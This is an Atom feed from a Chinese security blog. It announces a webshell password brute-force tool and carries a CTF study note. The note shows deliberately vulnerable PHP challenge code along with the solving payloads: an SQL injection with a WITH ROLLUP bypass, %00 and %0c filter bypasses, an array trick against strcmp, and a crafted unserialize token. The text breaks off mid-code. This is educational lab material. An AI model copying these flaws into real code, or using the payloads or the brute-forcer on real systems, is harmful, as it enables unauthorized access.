<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Hackfun - | Secblog | Pentest | Auditing | Sectool | CTF Write-up</title>
  <icon>https://www.gravatar.com/avatar/fa00ae710729f4b21e97bcbd3734b9cb</icon>
  <subtitle>Network Security Blog</subtitle>
  <link href="/atom.xml" rel="self"/>
  
  <link href="https://hackfun.org/"/>
  <updated>2018-04-26T08:45:31.063Z</updated>
  <id>https://hackfun.org/</id>
  
  <author>
    <name>Jing Ling</name>
    <email>jingling@hackfun.org</email>
  </author>
  
  <generator uri="http://hexo.io/">Hexo</generator>
  
  <entry>
    <title>Cheetah-GUI</title>
    <link href="https://hackfun.org/2018/04/26/Cheetah-GUI/"/>
    <id>https://hackfun.org/2018/04/26/Cheetah-GUI/</id>
    <published>2018-04-26T07:10:00.000Z</published>
    <updated>2018-04-26T08:45:31.063Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h1><p>Cheetah是一款基于字典的webshell密码爆破工具，Cheetah的工作原理是能根据自动探测出的web服务设置相关参数一次性提交大量的探测密码进行爆破，爆破效率是其他普通webshell密码暴力破解工具上千倍。此版本是Cheetah的图形用户版本，项目地址：<a href="https://github.com/sunnyelf/cheetah-gui" target="_blank" rel="external">https://github.com/sunnyelf/cheetah-gui</a>。</p><h1 id="0x01-特点"><a href="#0x01-特点" class="headerlink" title="0x01 特点"></a>0x01 特点</h1><ul><li>速度极快</li><li>支持代理</li><li>支持批量爆破</li><li>自动伪造请求</li><li>自动探测web服务设置相关参数</li><li>支持读取和去重超大密码字典文件</li><li>支持python 2.x和3.x</li><li>目前支持php、jsp、asp、aspx webshell</li></ul><h1 id="0x02-下载使用"><a href="#0x02-下载使用" class="headerlink" title="0x02 下载使用"></a>0x02 下载使用</h1><pre><code>git clone https://github.com/sunnyelf/cheetah-gui.gitcd cheetahpython cheetah.py</code></pre><h1 id="0x03-问题"><a href="#0x03-问题" class="headerlink" title="0x03 问题"></a>0x03 问题</h1><p>如果在使用过程中出现了bug欢迎提交<a href="https://github.com/sunnyelf/cheetah-gui/issues" target="_blank" rel="external">issues</a>，我会及时回复并修复。</p>]]></content>
    
    <summary type="html">
    
      
      
        &lt;h1 id=&quot;0x00-介绍&quot;&gt;&lt;a href=&quot;#0x00-介绍&quot; class=&quot;headerlink&quot; title=&quot;0x00 介绍&quot;&gt;&lt;/a&gt;0x00 介绍&lt;/h1&gt;&lt;p&gt;Cheetah是一款基于字典的webshell密码爆破工具，Cheetah的工作原理是能根据自动探测
      
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="cheetah" scheme="https://hackfun.org/tags/cheetah/"/>
    
      <category term="cheetah-gui" scheme="https://hackfun.org/tags/cheetah-gui/"/>
    
      <category term="webshell-password-cracker" scheme="https://hackfun.org/tags/webshell-password-cracker/"/>
    
  </entry>
  
  <entry>
    <title>CTF中常见PHP特性学习笔记</title>
    <link href="https://hackfun.org/2018/01/09/CTF%E4%B8%AD%E5%B8%B8%E8%A7%81PHP%E7%89%B9%E6%80%A7%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"/>
    <id>https://hackfun.org/2018/01/09/CTF中常见PHP特性学习笔记/</id>
    <published>2018-01-09T09:00:00.000Z</published>
    <updated>2018-01-09T11:07:07.000Z</updated>
    
    <content type="html"><![CDATA[<h2 id="01-extract变量覆盖"><a href="#01-extract变量覆盖" class="headerlink" title="01 extract变量覆盖"></a>01 extract变量覆盖</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$flag=<span class="string">'xxx'</span>; </div><div class="line">extract($_GET);</div><div class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($shiyan))</div><div class="line"> &#123; </div><div class="line">    $content=trim(file_get_contents($flag));</div><div class="line">    <span class="keyword">if</span>($shiyan==$content)</div><div class="line">    &#123; </div><div class="line">        <span class="keyword">echo</span><span class="string">'ctf&#123;xxx&#125;'</span>; </div><div class="line">    &#125;</div><div class="line">   <span class="keyword">else</span></div><div class="line">   &#123; </div><div class="line">    <span class="keyword">echo</span><span class="string">'Oh.no'</span>;</div><div class="line">   &#125; </div><div class="line">   &#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>资料：</p><ul><li><a href="http://www.w3school.com.cn/php/func_array_extract.asp" target="_blank" rel="external">PHP extract() 函数</a></li></ul><p><code>http://localhost/php_bugs/extract1.php?shiyan=&amp;flag=1</code></p><p><img src="https://i.imgur.com/RiZzqMb.png" alt="extract变量覆盖"></p><h2 id="02-绕过trim函数过滤"><a href="#02-绕过trim函数过滤" class="headerlink" title="02 绕过trim函数过滤"></a>02 绕过trim函数过滤</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"> </div><div class="line">$info = <span class="string">""</span>; </div><div class="line">$req = [];</div><div class="line">$flag=<span class="string">"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"</span>;</div><div class="line"> </div><div class="line">ini_set(<span class="string">"display_error"</span>, <span class="keyword">false</span>); <span class="comment">//为一个配置选项设置值</span></div><div class="line">error_reporting(<span class="number">0</span>); <span class="comment">//关闭所有PHP错误报告</span></div><div class="line"> </div><div class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'number'</span>]))&#123;</div><div class="line">   header(<span class="string">"hint:26966dc52e85af40f59b4fe73d8c323a.txt"</span>); <span class="comment">//HTTP头显示hint 26966dc52e85af40f59b4fe73d8c323a.txt</span></div><div class="line"> </div><div class="line">   <span class="keyword">die</span>(<span class="string">"have a fun!!"</span>); <span class="comment">//die — 等同于 exit()</span></div><div class="line"> </div><div class="line">&#125;</div><div class="line"> </div><div class="line"><span class="keyword">foreach</span>([$_GET, $_POST] <span class="keyword">as</span> $global_var) &#123;  <span class="comment">//foreach 语法结构提供了遍历数组的简单方式 </span></div><div class="line">    <span class="keyword">foreach</span>($global_var <span class="keyword">as</span> $key =&gt; $value) &#123; </div><div class="line">        $value = trim($value);  <span class="comment">//trim — 去除字符串首尾处的空白字符（或者其他字符）</span></div><div class="line">        is_string($value) &amp;&amp; $req[$key] = addslashes($value); <span class="comment">// is_string — 检测变量是否是字符串，addslashes — 使用反斜线引用字符串</span></div><div class="line">    &#125; </div><div class="line">&#125; </div><div class="line"> </div><div class="line"> </div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_palindrome_number</span><span class="params">($number)</span> </span>&#123; </div><div class="line">    $number = strval($number); <span class="comment">//strval — 获取变量的字符串值</span></div><div class="line">    $i = <span class="number">0</span>; </div><div class="line">    $j = strlen($number) - <span class="number">1</span>; <span class="comment">//strlen — 获取字符串长度</span></div><div class="line">    <span class="keyword">while</span>($i &lt; $j) &#123; </div><div class="line">        <span class="keyword">if</span>($number[$i] !== $number[$j]) &#123; </div><div class="line">            <span class="keyword">return</span> <span class="keyword">false</span>; </div><div class="line">        &#125; </div><div class="line">        $i++; </div><div class="line">        $j--; </div><div class="line">    &#125; </div><div class="line">    <span class="keyword">return</span> <span class="keyword">true</span>; </div><div class="line">&#125; </div><div class="line"> </div><div class="line"> </div><div class="line"><span class="keyword">if</span>(is_numeric($_REQUEST[<span class="string">'number'</span>])) <span class="comment">//is_numeric — 检测变量是否为数字或数字字符串 </span></div><div class="line">&#123;</div><div class="line"> </div><div class="line">   $info=<span class="string">"sorry, you cann't input a number!"</span>;</div><div class="line"> </div><div class="line">&#125;</div><div class="line"><span class="keyword">elseif</span>($req[<span class="string">'number'</span>]!=strval(intval($req[<span class="string">'number'</span>]))) <span class="comment">//intval — 获取变量的整数值</span></div><div class="line">&#123;</div><div class="line"> </div><div class="line">     $info = <span class="string">"number must be equal to it's integer!! "</span>;  </div><div class="line"> </div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span></div><div class="line">&#123;</div><div class="line"> </div><div class="line">     $value1 = intval($req[<span class="string">"number"</span>]);</div><div class="line">     $value2 = intval(strrev($req[<span class="string">"number"</span>]));  </div><div class="line"> </div><div class="line">     <span class="keyword">if</span>($value1!=$value2)&#123;</div><div class="line">          $info=<span class="string">"no, this is not a palindrome number!"</span>;</div><div class="line">     &#125;</div><div class="line">     <span class="keyword">else</span></div><div class="line">     &#123;</div><div class="line"> </div><div class="line">          <span class="keyword">if</span>(is_palindrome_number($req[<span class="string">"number"</span>]))&#123;</div><div class="line">              $info = <span class="string">"nice! &#123;$value1&#125; is a palindrome number!"</span>; </div><div class="line">          &#125;</div><div class="line">          <span class="keyword">else</span></div><div class="line">          &#123;</div><div class="line">             $info=$flag;</div><div class="line">          &#125;</div><div class="line">     &#125;</div><div class="line"> </div><div class="line">&#125;</div><div class="line"> </div><div class="line"><span class="keyword">echo</span> $info;</div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p>由于<code>is_numeric</code>没有检测<code>\0(%00)</code>，所以导致<code>is_numeric($_REQUEST[&#39;number&#39;])</code>为<code>False</code>，成功跳过检测。</p><p><img src="https://i.imgur.com/ut0KE1j.jpg" alt="is_numeric"></p><p>由于trim函数没有过滤<code>\f(%0c)</code>，而<code>intval</code>函数而跳过<code>\f(%0c)</code>，导致<code>$value1</code>和<code>$value2</code>都为相等，进入到<code>is_palindrome_number</code>函数成功通过<code>$number[$i] !== $number[$j]</code>检测返回<code>false</code>，最终进入到获取<code>$flag</code>最后的<code>else</code>里。</p><p><img src="https://i.imgur.com/y0n8H3y.jpg" alt="trim"></p><p>资料</p><ul><li><a href="http://www.chnpanda.com/961.html" target="_blank" rel="external">PHP类型与逻辑+fuzz与源代码审计</a></li></ul><p><code>http://localhost/php_bugs/02.php?number=%0c1</code></p><h2 id="03-多重加密"><a href="#03-多重加密" class="headerlink" title="03 多重加密"></a>03 多重加密</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">    <span class="keyword">include</span> <span class="string">'common.php'</span>;</div><div class="line">    $requset = array_merge($_GET, $_POST, $_COOKIE);</div><div class="line">    <span class="comment">//把一个或多个数组合并为一个数组</span></div><div class="line">    <span class="class"><span class="keyword">class</span> <span class="title">db</span></span></div><div class="line"><span class="class">    </span>&#123;</div><div class="line">        <span class="keyword">public</span> $where;</div><div class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span></div><div class="line"><span class="function">        </span>&#123;</div><div class="line">            <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;where))</div><div class="line">            &#123;</div><div class="line">                <span class="keyword">$this</span>-&gt;select(<span class="keyword">$this</span>-&gt;where);</div><div class="line">            &#125;</div><div class="line">        &#125;</div><div class="line">        <span class="function"><span class="keyword">function</span> <span class="title">select</span><span class="params">($where)</span></span></div><div class="line"><span class="function">        </span>&#123;</div><div class="line">            $sql = mysql_query(<span class="string">'select * from user where '</span>.$where);</div><div class="line">            <span class="comment">//函数执行一条 MySQL 查询。</span></div><div class="line">            <span class="keyword">return</span> @mysql_fetch_array($sql);</div><div class="line">            <span class="comment">//从结果集中取得一行作为关联数组，或数字数组，或二者兼有返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false</span></div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($requset[<span class="string">'token'</span>]))</div><div class="line">    <span class="comment">//测试变量是否已经配置。若变量已存在则返回 true 值。其它情形返回 false 值。</span></div><div class="line">    &#123;</div><div class="line">        $login = unserialize(gzuncompress(base64_decode($requset[<span class="string">'token'</span>])));</div><div class="line">        <span class="comment">//gzuncompress:进行字符串压缩</span></div><div class="line">        <span class="comment">//unserialize: 将已序列化的字符串还原回 PHP 的值</span></div><div class="line"></div><div class="line">        $db = <span class="keyword">new</span> db();</div><div class="line">        $row = $db-&gt;select(<span class="string">'user=\''</span>.mysql_real_escape_string($login[<span class="string">'user'</span>]).<span class="string">'\''</span>);</div><div class="line">        <span class="comment">//mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。</span></div><div class="line"></div><div class="line">        <span class="keyword">if</span>($login[<span class="string">'user'</span>] === <span class="string">'ichunqiu'</span>)</div><div class="line">        &#123;</div><div class="line">            <span class="keyword">echo</span> $flag;</div><div class="line">        &#125;<span class="keyword">else</span> <span class="keyword">if</span>($row[<span class="string">'pass'</span>] !== $login[<span class="string">'pass'</span>])&#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">'unserialize injection!!'</span>;</div><div class="line">        &#125;<span class="keyword">else</span>&#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"(╯‵□′)╯︵┴─┴ "</span>;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">    <span class="comment">// else&#123;</span></div><div class="line">    <span class="comment">//     header('Location: index.php?error=1');</span></div><div class="line">    <span class="comment">// &#125;</span></div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$arr = <span class="keyword">array</span>([<span class="string">'user'</span>] === <span class="string">'ichunqiu'</span>);</div><div class="line">$token = base64_encode(gzcompress(serialize($arr)));</div><div class="line">print_r($token);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><code>eJxLtDK0qs60MrBOAuJaAB5uBBQ=</code></p><p><code>http://127.0.0.1/php_bugs/03.php?token=eJxLtDK0qs60MrBOAuJaAB5uBBQ=</code></p><h2 id="04-SQL注入WITH-ROLLUP绕过"><a href="#04-SQL注入WITH-ROLLUP绕过" class="headerlink" title="04 SQL注入WITH ROLLUP绕过"></a>04 SQL注入WITH ROLLUP绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"></div><div class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'pwd'</span>])) &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;form action="" method="post"&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;input name="uname" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;input name="pwd" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;input type="submit" /&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;/form&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;!--source: source.txt--&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">die</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">AttackFilter</span><span class="params">($StrKey,$StrValue,$ArrReq)</span></span>&#123;  </div><div class="line">    <span class="keyword">if</span> (is_array($StrValue))&#123;</div><div class="line"></div><div class="line"><span class="comment">//检测变量是否是数组</span></div><div class="line"></div><div class="line">        $StrValue=implode($StrValue);</div><div class="line"></div><div class="line"><span class="comment">//返回由数组元素组合成的字符串</span></div><div class="line"></div><div class="line">    &#125;</div><div class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/"</span>.$ArrReq.<span class="string">"/is"</span>,$StrValue)==<span class="number">1</span>)&#123;   </div><div class="line"></div><div class="line"><span class="comment">//匹配成功一次后就会停止匹配</span></div><div class="line"></div><div class="line">        <span class="keyword">print</span> <span class="string">"水可载舟，亦可赛艇！"</span>;</div><div class="line">        <span class="keyword">exit</span>();</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$filter = <span class="string">"and|select|from|where|union|join|sleep|benchmark|,|\(|\)"</span>;</div><div class="line"><span class="keyword">foreach</span>($_POST <span class="keyword">as</span> $key=&gt;$value)&#123; </div><div class="line"></div><div class="line"><span class="comment">//遍历数组</span></div><div class="line"></div><div class="line">    AttackFilter($key,$value,$filter);</div><div class="line">&#125;</div><div class="line"></div><div class="line">$con = mysql_connect(<span class="string">"localhost"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>);</div><div class="line"><span class="keyword">if</span> (!$con)&#123;</div><div class="line">    <span class="keyword">die</span>(<span class="string">'Could not connect: '</span> . mysql_error());</div><div class="line">&#125;</div><div class="line">$db=<span class="string">"test"</span>;</div><div class="line">mysql_select_db($db, $con);</div><div class="line"></div><div class="line"><span class="comment">//设置活动的 MySQL 数据库</span></div><div class="line"></div><div class="line">$sql=<span class="string">"SELECT * FROM interest WHERE uname = '&#123;$_POST['uname']&#125;'"</span>;</div><div class="line"><span class="keyword">echo</span> $sql;</div><div class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</div><div class="line">$query = mysql_query($sql); </div><div class="line"></div><div class="line"><span class="comment">//执行一条 MySQL 查询</span></div><div class="line">var_dump(mysql_num_rows($query));</div><div class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</div><div class="line"><span class="keyword">if</span> (mysql_num_rows($query) == <span class="number">1</span>) &#123; </div><div class="line"></div><div class="line"><span class="comment">//返回结果集中行的数目</span></div><div class="line"></div><div class="line">    $key = mysql_fetch_array($query);</div><div class="line"></div><div class="line"><span class="comment">//返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false</span></div><div class="line"></div><div class="line">    <span class="keyword">if</span>($key[<span class="string">'pwd'</span>] == $_POST[<span class="string">'pwd'</span>]) &#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"CTF&#123;XXXXXX&#125;"</span>;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"亦可赛艇！"</span>;</div><div class="line">    &#125;</div><div class="line">&#125;<span class="keyword">else</span>&#123;</div><div class="line">    <span class="keyword">print</span> <span class="string">"一颗赛艇！"</span>;</div><div class="line">&#125;</div><div class="line">mysql_close($con);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>资料：</p><ul><li><a href="http://blog.csdn.net/qq_35078631/article/details/54772798" target="_blank" rel="external">实验吧 因缺思汀的绕过 By Assassin（with rollup统计）</a></li><li><a href="http://blog.csdn.net/id19870510/article/details/6254358" target="_blank" rel="external">使用 GROUP BY WITH ROLLUP 改善统计性能</a></li><li><a href="http://www.bubuko.com/infodetail-2169730.html" target="_blank" rel="external">因缺思汀的绕过</a></li></ul><p><code>pwd&amp;uname=admin&#39; group by pwd with rollup limit 1 offset 1#--</code></p><p><img src="https://i.imgur.com/CsR6w8b.png" alt="with rollup"></p><p><img src="https://i.imgur.com/0qPBqKN.png" alt="with rollup"></p><h2 id="05-ereg正则-00截断"><a href="#05-ereg正则-00截断" class="headerlink" title="05 ereg正则%00截断"></a>05 ereg正则%00截断</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"></div><div class="line">$flag = <span class="string">"flag"</span>;</div><div class="line"></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) </div><div class="line">&#123;</div><div class="line">  <span class="keyword">if</span> (ereg (<span class="string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="string">'password'</span>]) === <span class="keyword">FALSE</span>)</div><div class="line">  &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (strlen($_GET[<span class="string">'password'</span>]) &lt; <span class="number">8</span> &amp;&amp; $_GET[<span class="string">'password'</span>] &gt; <span class="number">9999999</span>)</div><div class="line">   &#123;</div><div class="line">     <span class="keyword">if</span> (strpos ($_GET[<span class="string">'password'</span>], <span class="string">'*-*'</span>) !== <span class="keyword">FALSE</span>) <span class="comment">//strpos — 查找字符串首次出现的位置</span></div><div class="line">      &#123;</div><div class="line">      <span class="keyword">die</span>(<span class="string">'Flag: '</span> . $flag);</div><div class="line">      &#125;</div><div class="line">      <span class="keyword">else</span></div><div class="line">      &#123;</div><div class="line">        <span class="keyword">echo</span>(<span class="string">'&lt;p&gt;*-* have not been found&lt;/p&gt;'</span>); </div><div class="line">       &#125;</div><div class="line">      &#125;</div><div class="line">     <span class="keyword">else</span> </div><div class="line">     &#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Invalid password&lt;/p&gt;'</span>; </div><div class="line">      &#125;</div><div class="line">   &#125; </div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>资料：</p><ul><li><a href="http://www.am0s.com/functions/203.html" target="_blank" rel="external">eregi()</a></li></ul><p><code>http://localhost/php_bugs/05.php?password=1e9%00*-*</code></p><h2 id="06-strcmp比较字符串"><a href="#06-strcmp比较字符串" class="headerlink" title="06 strcmp比较字符串"></a>06 strcmp比较字符串</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$flag = <span class="string">"flag"</span>;</div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'a'</span>])) &#123;  </div><div class="line">    <span class="keyword">if</span> (strcmp($_GET[<span class="string">'a'</span>], $flag) == <span class="number">0</span>) <span class="comment">//如果 str1 小于 str2 返回 &lt; 0； 如果 str1大于 str2返回 &gt; 0；如果两者相等，返回 0。 </span></div><div class="line"></div><div class="line">    <span class="comment">//比较两个字符串（区分大小写） </span></div><div class="line">        <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);  </div><div class="line">    <span class="keyword">else</span>  </div><div class="line">        <span class="keyword">print</span> <span class="string">'No'</span>;  </div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">int strcmp ( string $str1 , string $str2 )</div><div class="line">// 参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 &lt; 0； 如果 str1 大于 str2 返回 &gt; 0；如果两者相等，返回 0。</div></pre></td></tr></table></figure><p>在PHP官方文档中，说明了strcmp函数在5.2版本和5.3版本的区别。</p><blockquote><p>Note a difference between 5.2 and 5.3 versions</p><p>echo (int)strcmp(‘pending’,array());<br>will output -1 in PHP 5.2.16 (probably in all versions prior 5.3)<br>but will output 0 in PHP 5.3.3</p><p>Of course, you never need to use array as a parameter in string comparisions.</p></blockquote><p>5.3之前版本如果传入数组参数strcmp函数将会返回-1：</p><p><img src="https://i.imgur.com/tKgyoKw.png" alt="strcmp漏洞"></p><p>在5.3.3版本之后使用这个函数传入数组参数比较会返回0，也就是判定其相等，后来PHP官方后面的版本中修复了这个漏洞，当传入非字符串参数导致报错的时函数不返回任何值，也就是返回<code>NULL</code>，但是由于这里<code>==</code>弱类型判断，导致<code>NULL==0</code>为 <code>bool(true)</code>。</p><p><code>http://localhost/php_bugs/06.php?a[]=1</code></p><p><img src="https://i.imgur.com/AeH6Oc8.png" alt="strcmp漏洞"></p><h2 id="07-sha-函数比较绕过"><a href="#07-sha-函数比较绕过" class="headerlink" title="07 sha()函数比较绕过"></a>07 sha()函数比较绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">$flag = <span class="string">"flag"</span>;</div><div class="line"></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'name'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>($_GET[<span 